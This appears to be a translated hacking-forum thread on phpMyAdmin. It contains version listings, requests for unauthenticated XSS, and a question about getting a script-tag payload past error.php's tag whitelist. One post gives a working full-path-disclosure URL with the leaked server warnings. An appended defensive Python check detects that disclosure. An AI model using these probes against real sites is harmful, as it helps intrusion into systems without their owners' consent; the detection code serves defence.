    /phpMyAdmin-3.3.8.1/
    /phpMyAdmin-3.3.8/
    /phpMyAdmin-3.3.9-rc1/
    /phpMyAdmin-3.3.9.1/
    /phpMyAdmin-3.3.9.2/
    /phpMyAdmin-3.3.9/
    /phpMyAdmin-3.4.0-alpha1/
    /phpMyAdmin-3.4.0-alpha2/
    /phpMyAdmin-3.4.0-beta1/
    /phpMyAdmin-3.4.0-beta2/
    /phpMyAdmin-3.4.0-beta3/
    /phpMyAdmin-3.4.0-beta4/
    /phpMyAdmin-3.4.0-rc1/
    /phpMyAdmin-3.4.0-rc2/
    /phpMyAdmin-3.4.0/
    /phpMyAdmin-3.4.1-rc1/
    /phpMyAdmin-3.4.1/
    /phpMyAdmin-3.4.10-rc1/
    /phpMyAdmin-3.4.10.1/
    /phpMyAdmin-3.4.10.2/
    /phpMyAdmin-3.4.10/
    /phpMyAdmin-3.4.11-rc1/
    /phpMyAdmin-3.4.11.1/
    /phpMyAdmin-3.4.11/
    /phpMyAdmin-3.4.2-rc1/
    /phpMyAdmin-3.4.2/
    /phpMyAdmin-3.4.3-rc1/
    /phpMyAdmin-3.4.3.1/
    /phpMyAdmin-3.4.3.2/
    /phpMyAdmin-3.4.3/
    /phpMyAdmin-3.4.4-rc1/
    /phpMyAdmin-3.4.4/
    /phpMyAdmin-3.4.5-rc1/
    /phpMyAdmin-3.4.5/
    /phpMyAdmin-3.4.6-rc1/
    /phpMyAdmin-3.4.6/
    /phpMyAdmin-3.4.7-rc1/
    /phpMyAdmin-3.4.7.1/
    /phpMyAdmin-3.4.7/
    /phpMyAdmin-3.4.8-rc1/
    /phpMyAdmin-3.4.8/
    /phpMyAdmin-3.4.9-rc1/
    /phpMyAdmin-3.4.9/
    /phpMyAdmin-3.5.0-alpha1/
    /phpMyAdmin-3.5.0-beta1/
    /phpMyAdmin-3.5.0-rc1/
    /phpMyAdmin-3.5.0-rc2/
    /phpMyAdmin-3.5.0/
    /phpMyAdmin-3.5.1-rc1/
    /phpMyAdmin-3.5.1/
    /phpMyAdmin-3.5.2-rc1/
    /phpMyAdmin-3.5.2.1/
    /phpMyAdmin-3.5.2.2/
    /phpMyAdmin-3.5.2/
    /phpMyAdmin-3.5.3-rc1/
    /phpMyAdmin-3.5.3/
    /phpMyAdmin-3.5.4-rc1/
    /phpMyAdmin-3.5.4/
    /phpMyAdmin-3.5.5-rc1/
    /phpMyAdmin-3.5.5/
    /phpMyAdmin-3.5.6-rc1/
    /phpMyAdmin-3.5.6/
    /phpMyAdmin-3.5.7-rc1/
    /phpMyAdmin-3.5.7/
    /phpMyAdmin-3.5.8-rc1/
    /phpMyAdmin-3.5.8.1/
    /phpMyAdmin-3.5.8.2/
    /phpMyAdmin-3.5.8/
    /phpMyAdmin-3/
    /phpMyAdmin-4.0.0-alpha1/
    /phpMyAdmin-4.0.0-alpha2/
    /phpMyAdmin-4.0.0-beta1/
    /phpMyAdmin-4.0.0-beta2/
    /phpMyAdmin-4.0.0-rc2/
    /phpMyAdmin-4.0.0-rc3/
    /phpMyAdmin-4.0.0-rc4/
    /phpMyAdmin-4.0.0/
    /phpMyAdmin-4.0.1-rc1/
    /phpMyAdmin-4.0.1/
    /phpMyAdmin-4.0.10.1/
    /phpMyAdmin-4.0.10.2/
    /phpMyAdmin-4.0.10.3/
    /phpMyAdmin-4.0.10.4/
    /phpMyAdmin-4.0.10.5/
    /phpMyAdmin-4.0.10.6/
    /phpMyAdmin-4.0.10.7/
    /phpMyAdmin-4.0.10.8/
    /phpMyAdmin-4.0.10.9/
    /phpMyAdmin-4.0.10/
    /phpMyAdmin-4.0.2-rc1/
    /phpMyAdmin-4.0.2/
    /phpMyAdmin-4.0.3-rc1/
    /phpMyAdmin-4.0.3/
    /phpMyAdmin-4.0.4-rc1/
    /phpMyAdmin-4.0.4.1/
    /phpMyAdmin-4.0.4.2/
    #33 zuzzz, 16 Jun 2015
    Last edited: 2 Jul 2015
    crlf, grimnir, SuNDowN and 3 others like this.
  14. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    50
    Likes Received:
    2
    Reputations:
    0
    phpmyadmin 3.4.8, is there anything for this?
     
  15. WallHack

    WallHack Elder

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Cross-Site-Scripting
     
  16. proger_doe

    proger_doe New Member

    Joined:
    5 Feb 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  17. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,108
    Likes Received:
    752
    Reputations:
    200
    _________________________
  18. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    82
    Likes Received:
    2
    Reputations:
    5
    Can you tell me which XSS that do not require authentication exist for versions from 2.11 on?
     
  19. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    82
    Likes Received:
    2
    Reputations:
    5
    OK, then tell me how <script>alert()</script> can be inserted into the page "http://***.org/phpMyAdmin/error.php?type=ErrorHeader&error=TextForError", if the parameters only accept tags of this kind:
    '[i]' => '<em>',
    '[/i]' => '</em>',
    '[em]' => '<em>',
    '[/em]' => '</em>',
    '[b]' => '<strong>',
    '[/b]' => '</strong>',
    '[strong]' => '<strong>',
    '[/strong]' => '</strong>',
    '[tt]' => '<code>',
    '[/tt]' => '</code>',
    '[*code]' => '<code>',
    '[*/code]' => '</code>',
    '[kbd]' => '<kbd>',
    '[/kbd]' => '</kbd>',
    '[br]' => '<br />',
    '[/a]' => '</a>',
    '[sup]' => '<sup>',
    '[/sup]' => '</sup>',
     
  20. Sleep

    Sleep Elder

    Joined:
    31 Oct 2007
    Messages:
    282
    Likes Received:
    65
    Reputations:
    4
    full path disclosure
    tested on 4.0.8. I can't say in which version it was fixed
    http://site.com/myadmin/js/get_scripts.js.php?scripts[][]=123

    Code:
    Warning: explode() expects parameter 2 to be string, array given in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 20
    
    Warning: Invalid argument supplied for foreach() in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 21
    
     
    foozzione likes this.
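Added example, not part of the thread and not phpMyAdmin code: a check a site owner can run over their own requests and response bodies to catch the path disclosure from post 20. It flags query parameters that PHP parses as a nested array and extracts file paths from PHP diagnostics printed into a response. The function names, `NORMAL_URL` and `HTML_BODY` are constructed for illustration; `POST_URL` and `POST_BODY` are the text quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP diagnostic as printed when display_errors is on:
# "<level>: <message> in <file> on line <n>".
PHP_DIAG = re.compile(
    r"(?P<level>Warning|Notice|Deprecated|Fatal error):\s+.+?\s+in\s+"
    r"(?P<path>(?:/|[A-Za-z]:\\)\S+?)\s+on line\s+(?P<line>\d+)"
)
# Parameter name with two or more bracket groups: PHP builds a nested array from it.
NESTED_ARRAY = re.compile(r"^[^\[\]]+(?:\[[^\]]*\]){2,}$")

# Request and response text quoted in post 20.
POST_URL = "http://site.com/myadmin/js/get_scripts.js.php?scripts[][]=123"
POST_BODY = """Warning: explode() expects parameter 2 to be string, array given in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 20

Warning: Invalid argument supplied for foreach() in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 21
"""
# Constructed samples: a flat array parameter and a diagnostic in html_errors markup.
NORMAL_URL = "http://site.com/myadmin/js/get_scripts.js.php?scripts[]=functions.js"
HTML_BODY = ("<br />\n<b>Warning</b>:  Invalid argument supplied for foreach() "
             "in <b>/srv/app/index.php</b> on line <b>7</b><br />")


def leaked_paths(body):
    """Return (level, path, line) for each PHP diagnostic found in a response body."""
    text = re.sub(r"<[^>]+>", "", body)  # drop html_errors markup before matching
    return [(m["level"], m["path"], int(m["line"])) for m in PHP_DIAG.finditer(text)]


def nested_array_params(url):
    """Return query parameter names that PHP would turn into a nested array."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [name for name, _ in pairs if NESTED_ARRAY.match(name)]


if __name__ == "__main__":
    print(nested_array_params(POST_URL))
    print(leaked_paths(POST_BODY))
```

A non-empty result from `leaked_paths` on a production response means `display_errors` is still enabled; setting `display_errors = Off` and logging errors instead removes the disclosure regardless of which parameter triggers the warning.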